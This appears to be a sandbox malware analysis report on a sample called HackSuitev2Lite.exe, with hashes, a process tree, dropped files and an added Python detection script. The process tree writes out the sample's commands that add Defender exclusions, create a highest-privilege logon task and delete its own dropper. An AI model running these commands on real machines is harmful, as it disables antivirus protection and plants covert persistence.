Analysis

  • max time kernel
    134s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64 · arch:x86 · image:win7-20240708-en · locale:en-us · os:windows7-x64 · system
  • submitted
    24-12-2024 00:30

General

  • Target

    HackSuitev2Lite.exe

  • Size

    124KB

  • MD5

    e6d4f94c1ed2989dd2ef52daf6ab9334

  • SHA1

    237d1643c44d8759036e61256d7cc7355c814915

  • SHA256

    e00004a583d1fe4816b9d0049f3bf3d5cdedd65e9ed50c5ee34f0bdfe0dac4d2

  • SHA512

    f7d7fbd9c8c2a357c7b119f9a5d541de8c1704923e1b20aacd4f5f79db8c9f554dfe606dfee5f1d6f5dd460a59e69d68632c08ea7917c5ad2881875cd46120b7

  • SSDEEP

    3072:4S3vH68fUJj4uuNqmE7eF9gPLE3pyzdeoqJL9F6R0gfLtiR/j8qNxb:4S3SJR3uNqR29hk2nO7AY

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    The sample spawns cmd.exe, which runs PowerShell's Add-MpPreference four times to add Windows Defender path exclusions for %UserProfile%, %AppData%, %Temp% and %SystemRoot% (expanded in this sandbox to C:\Users\Admin, C:\Users\Admin\AppData\Roaming, C:\Users\Admin\AppData\Local\Temp and C:\Windows). Only -ExclusionPath is used; no extension or process exclusions are added. Every file the sample later drops lands inside one of those four trees, so later stages are written to paths Defender has already been told to ignore. The same cmd line is re-issued by each copy of services64.exe, which accounts for the 12 powershell.exe invocations in the tree.

  • Executes dropped EXE 6 IoCs

    C:\Windows\system32\services64.exe is byte-identical to the submitted HackSuitev2Lite.exe (same 124KB size and the same MD5/SHA1/SHA256/SHA512 under Downloads), i.e. the sample copies itself into System32 under a service-like name. Two further payloads are dropped: svchost64.exe (38KB) in the user's Temp directory, which creates the scheduled task and launches services64.exe and sihost64.exe, and sihost64.exe (7KB) in C:\Windows\system32\Microsoft\Libs, next to a 14KB driver, WR64.sys. After each launch, svchost64.exe is removed by a cmd.exe one-liner that uses choice /C Y /N /D Y /T 3 as a three-second sleep before Del, so the Temp copy is short-lived on disk while the System32 copies persist.
  • Loads dropped DLL 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 5 IoCs

    Fires on the svchost64.exe stages (PIDs 2120 and 712). The CryptnetUrlCache metadata files and the Cab85A6.tmp/Tar85C8.tmp files listed under Downloads are consistent with the same certificate-handling activity.
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution. Here svchost64.exe runs schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"', a task that starts the System32 copy of the sample at every logon with the highest privileges available to the user; /f overwrites any existing task of that name, so the command is safe to repeat and each stage re-issues it (three schtasks.exe processes in the tree).

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\HackSuitev2Lite.exe
    "C:\Users\Admin\AppData\Local\Temp\HackSuitev2Lite.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Windows\system32\cmd.exe
      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2796
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1740
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\HackSuitev2Lite.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\HackSuitev2Lite.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1276
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1128
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1764
        • C:\Windows\system32\services64.exe
          "C:\Windows\system32\services64.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:800
          • C:\Windows\system32\cmd.exe
            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2620
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2648
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:316
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1600
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1148
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
            5⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:780
            • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
              C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2120
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2020
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1040
              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                PID:1532
                • C:\Windows\system32\services64.exe
                  "C:\Windows\system32\services64.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:860
                  • C:\Windows\system32\cmd.exe
                    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                    9⤵
                      PID:1728
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1428
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1008
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1124
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1784
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                      9⤵
                      • Loads dropped DLL
                      PID:2292
                      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
                        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        10⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:712
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                          11⤵
                            PID:2360
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                              12⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:1804
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                            11⤵
                              PID:2212
                              • C:\Windows\system32\choice.exe
                                choice /C Y /N /D Y /T 3
                                12⤵
                                  PID:2320
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                        7⤵
                          PID:2624
                          • C:\Windows\system32\choice.exe
                            choice /C Y /N /D Y /T 3
                            8⤵
                              PID:3052
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:684
                      • C:\Windows\system32\choice.exe
                        choice /C Y /N /D Y /T 3
                        5⤵
                          PID:2864
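The behaviours visible in the tree above (Defender exclusion abuse, an on-logon task with /rl highest, choice-as-sleep self-deletion, and system-name masquerading such as services64.exe) can be turned into detection logic. The following Python is an added example written for this page; it is not part of the sandbox report or of the sample. EVENTS is constructed by transcribing (image, command line) pairs from the process tree, DROPPED is the set of paths listed under Downloads, and the regexes, the list of imitated system binary names and the "broad exclusion" threshold are the author's own choices.

```python
# Detection logic for this report's behaviours.  Added example, not part of
# the sandbox report; EVENTS and DROPPED are transcribed from the page.
import ntpath
import re

# (image, command line) pairs transcribed from the process tree.  Constructed sample data.
EVENTS = [
    (r"C:\Windows\system32\cmd.exe",
     "\"cmd\" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & "
     "powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & "
     "powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & "
     "powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'"),
    (r"C:\Users\Admin\AppData\Local\Temp\svchost64.exe",
     r'C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\HackSuitev2Lite.exe"'),
    (r"C:\Windows\system32\schtasks.exe",
     r"""schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'"""),
    (r"C:\Windows\system32\services64.exe", r'"C:\Windows\system32\services64.exe"'),
    (r"C:\Windows\system32\Microsoft\Libs\sihost64.exe", r'"C:\Windows\system32\Microsoft\Libs\sihost64.exe"'),
    (r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"'),
]
# Paths listed under Downloads in this report.
DROPPED = [
    r"C:\Users\Admin\AppData\Local\Temp\svchost64.exe",
    r"C:\Windows\system32\services64.exe",
    r"C:\Windows\system32\Microsoft\Libs\sihost64.exe",
    r"C:\Windows\system32\Microsoft\Libs\WR64.sys",
]

RE_EXCLUSION = re.compile(
    r"Add-MpPreference\s+-Exclusion(Path|Extension|Process)\s+['\"]?([^'\"&]+)", re.I)
RE_SCHTASKS = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.I)
# "choice ... /T n & del file": choice is abused as a sleep before the delete.
RE_SELFDELETE = re.compile(r"\bchoice\b[^&]*?/T\s+(\d+)[^&]*&\s*del\s+\"?([^\"]+)", re.I)
RE_SUFFIXED = re.compile(r"^([a-z]+)(32|64)\.exe$", re.I)
# Real Windows binary names the sample imitates by appending "64" (author's list, an assumption).
SYSTEM_NAMES = {"services", "svchost", "sihost", "lsass", "csrss", "winlogon", "smss", "wininit"}


def _arg(cmdline, switch):
    """Value of a schtasks switch: quoted ('"..."' or "...") or a bare token."""
    m = re.search(rf"/{switch}\s+(?:'?\"([^\"]+)\"'?|(\S+))", cmdline, re.I)
    return (m.group(1) or m.group(2)) if m else None


def is_broad(target):
    """Bare %VAR% or at most three path components (drive root, Windows
    directory, user profile root): shields a whole tree, not one product dir."""
    if re.fullmatch(r"%[^%]+%", target):
        return True
    return len([p for p in ntpath.normcase(target).split("\\") if p]) <= 3


def is_masquerade(image):
    """services64.exe / svchost64.exe / sihost64.exe style names."""
    m = RE_SUFFIXED.match(ntpath.basename(image))
    return bool(m) and m.group(1).lower() in SYSTEM_NAMES


def covered_by(path, exclusions):
    """The exclusion whose tree contains `path` (case-insensitive prefix), or None."""
    p = ntpath.normcase(path)
    for ex in exclusions:
        e = ntpath.normcase(ex).rstrip("\\")
        if p == e or p.startswith(e + "\\"):
            return ex
    return None


def analyse(events):
    f = {"exclusions": [], "broad_exclusions": [], "logon_tasks": [],
         "self_delete": [], "masquerade": []}
    for image, cmdline in events:
        for kind, target in RE_EXCLUSION.findall(cmdline):
            target = target.strip()
            f["exclusions"].append((kind, target))
            if is_broad(target):
                f["broad_exclusions"].append(target)
        if RE_SCHTASKS.search(cmdline):
            sc, rl = _arg(cmdline, "sc"), _arg(cmdline, "rl")
            if (sc or "").lower() == "onlogon" and (rl or "").lower() == "highest":
                f["logon_tasks"].append((_arg(cmdline, "tn"), _arg(cmdline, "tr")))
        m = RE_SELFDELETE.search(cmdline)
        if m:
            f["self_delete"].append((int(m.group(1)), m.group(2).strip()))
        if is_masquerade(image):
            f["masquerade"].append(image)
    return f


def uncovered_drops(findings, dropped=DROPPED):
    """Dropped files that no expanded (non-%VAR%) exclusion shields."""
    concrete = [t for _, t in findings["exclusions"] if not t.startswith("%")]
    return [p for p in dropped if covered_by(p, concrete) is None]


if __name__ == "__main__":
    found = analyse(EVENTS)
    for key, items in found.items():
        print(f"{key}: {items}")
    print("drops outside every exclusion:", uncovered_drops(found))
```

To run this against real telemetry, replace EVENTS with (Image, CommandLine) pairs from Sysmon event ID 1 or an EDR process-creation export. Both the unexpanded %UserProfile% forms in the parent cmd.exe line and the expanded forms in the powershell.exe children are reported, so a sensor that captures only one of the two still fires. The result worth reading out of this sample is uncovered_drops returning an empty list: every artifact under Downloads lands inside a tree that the first stage has already excluded from Defender.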

                Network

                MITRE ATT&CK Enterprise v15

                Downloads

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  342B

                  MD5

                  c6cbb6a86bc4efa1a5a279950315cd74

                  SHA1

                  b9b6d7fb6d5fa385a9a99529885a3adc81384bec

                  SHA256

                  25e0b3c1fb9b1dba4d48cf970fa22a63a77654f2a78b3d2eb70796dcc7955724

                  SHA512

                  33b37bff958bc57af75386215a2e7435c2cae38e78f802a1b0c3cbf39e2d8dbc1de0cf94541b068a7ab5949d9e9a8c91f6e0d4857dbd6fd0babae5c5b11a127a

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  342B

                  MD5

                  4fd63f2858f4ce54592d72bdc54bfb0a

                  SHA1

                  9721a5642fe9a01471dc70b54be7acae8c1cbf7c

                  SHA256

                  8e6470ee569f16268cb46d08f22785baa800320d9c2858a0b0ddccaa6b9f212c

                  SHA512

                  a12d9afa07b68c476533eaebb0a9a8cb89378c5a32836bf1e4f7ca3d66136df1eae461f70f0169b7b151b432eb3ec2c279f1cf0b34b09853c55c75d8dd736ca5

                • C:\Users\Admin\AppData\Local\Temp\Cab85A6.tmp

                  Filesize

                  70KB

                  MD5

                  49aebf8cbd62d92ac215b2923fb1b9f5

                  SHA1

                  1723be06719828dda65ad804298d0431f6aff976

                  SHA256

                  b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                  SHA512

                  bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                • C:\Users\Admin\AppData\Local\Temp\Tar85C8.tmp

                  Filesize

                  181KB

                  MD5

                  4ea6026cf93ec6338144661bf1202cd1

                  SHA1

                  a1dec9044f750ad887935a01430bf49322fbdcb7

                  SHA256

                  8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                  SHA512

                  6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  283930e8eada9eaf40223c1ddb55162e

                  SHA1

                  1140992ac5f42fd7d5c77766a7811cf935b8c8c8

                  SHA256

                  ec751ef10d75e8c975338260e8db0c00e8ce63288728acd19a3d741b7c62023f

                  SHA512

                  9835be58ceb43fb9beab270cd2a0e71663ad877834adc594015642fe1f4ff4721de44dd29dc0cd39b79a980f4d017597f1cc36f5c086e6ca9387c563259f4ada

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  eb8426f106fc66393ede32fbf1da17c6

                  SHA1

                  9be56ef8775708cd1f8c9f8f8d258f68d85669c6

                  SHA256

                  8e6aa4be62a33f07b2d7ae602de9968f5d7e410fd859de01faeabc1ec10274c4

                  SHA512

                  c8efca357ca2eadb95c428d41098b55310fae24eeb17f3190ecafe64601c46a227bd3573b39ad9d8893e6da801af87b43ea5c40f8f83814da48692e855427167

                • C:\Windows\system32\Microsoft\Libs\WR64.sys

                  Filesize

                  14KB

                  MD5

                  0c0195c48b6b8582fa6f6373032118da

                  SHA1

                  d25340ae8e92a6d29f599fef426a2bc1b5217299

                  SHA256

                  11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

                  SHA512

                  ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

                • \Users\Admin\AppData\Local\Temp\svchost64.exe

                  Filesize

                  38KB

                  MD5

                  fdd26ba90d4f9c1ca7e58fdad3ba4f19

                  SHA1

                  e0425fcd3d99398ec29f1f243733b2c1b9a27af9

                  SHA256

                  73330ff39a9e2266d9b47cee5baf41da9833b81bfaa7f6173b0b8700df867662

                  SHA512

                  771ce349faba771d52279629fb1bc838a2342c88da27cec823f6f6a5f91013786d53d5ff2ad41c7ab422c293b93f00121e7ee78a4ffec568da5270a7cf40a0bc

                • \Windows\System32\Microsoft\Libs\sihost64.exe

                  Filesize

                  7KB

                  MD5

                  c75e4985f44b1aaf20a29101c7289884

                  SHA1

                  bd683b05939d453e953500c813557fbacc4472e8

                  SHA256

                  269073ab5efaba49aabbc6b9d79c693a08fb018f4e8cb538930c3594a7b16473

                  SHA512

                  bad68234138e17a8eda512b208e1aa2875ab0a4517a4b4895f46f26b4eb9af7304711400c290917d2fc39371769534396c20181e48cc70d8b87c12efea1e5dbb

                • \Windows\System32\services64.exe

                  Filesize

                  124KB

                  MD5

                  e6d4f94c1ed2989dd2ef52daf6ab9334

                  SHA1

                  237d1643c44d8759036e61256d7cc7355c814915

                  SHA256

                  e00004a583d1fe4816b9d0049f3bf3d5cdedd65e9ed50c5ee34f0bdfe0dac4d2

                  SHA512

                  f7d7fbd9c8c2a357c7b119f9a5d541de8c1704923e1b20aacd4f5f79db8c9f554dfe606dfee5f1d6f5dd460a59e69d68632c08ea7917c5ad2881875cd46120b7

                • memory/712-213-0x000000013FEC0000-0x000000013FECE000-memory.dmp

                  Filesize

                  56KB

                • memory/800-48-0x000000013F7C0000-0x000000013F7E2000-memory.dmp

                  Filesize

                  136KB

                • memory/860-187-0x000000013F3B0000-0x000000013F3D2000-memory.dmp

                  Filesize

                  136KB

                • memory/1276-41-0x000000013F500000-0x000000013F50E000-memory.dmp

                  Filesize

                  56KB

                • memory/1532-84-0x000000013F760000-0x000000013F766000-memory.dmp

                  Filesize

                  24KB

                • memory/2120-76-0x000000013F550000-0x000000013F55E000-memory.dmp

                  Filesize

                  56KB

                • memory/2272-34-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/2272-2-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/2272-0-0x000007FEF5173000-0x000007FEF5174000-memory.dmp

                  Filesize

                  4KB

                • memory/2272-33-0x000007FEF5173000-0x000007FEF5174000-memory.dmp

                  Filesize

                  4KB

                • memory/2272-1-0x000000013F350000-0x000000013F372000-memory.dmp

                  Filesize

                  136KB

                • memory/2272-36-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/2720-21-0x0000000001CF0000-0x0000000001CF8000-memory.dmp

                  Filesize

                  32KB

                • memory/2720-20-0x000000001B630000-0x000000001B912000-memory.dmp

                  Filesize

                  2.9MB

                • memory/2796-13-0x000007FEF2600000-0x000007FEF2F9D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2796-11-0x000007FEF2600000-0x000007FEF2F9D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2796-12-0x000007FEF2600000-0x000007FEF2F9D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2796-9-0x000000001B520000-0x000000001B802000-memory.dmp

                  Filesize

                  2.9MB

                • memory/2796-8-0x000007FEF2600000-0x000007FEF2F9D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2796-7-0x000007FEF28BE000-0x000007FEF28BF000-memory.dmp

                  Filesize

                  4KB

                • memory/2796-10-0x0000000001F80000-0x0000000001F88000-memory.dmp

                  Filesize

                  32KB

                • memory/2796-14-0x000007FEF2600000-0x000007FEF2F9D000-memory.dmp

                  Filesize

                  9.6MB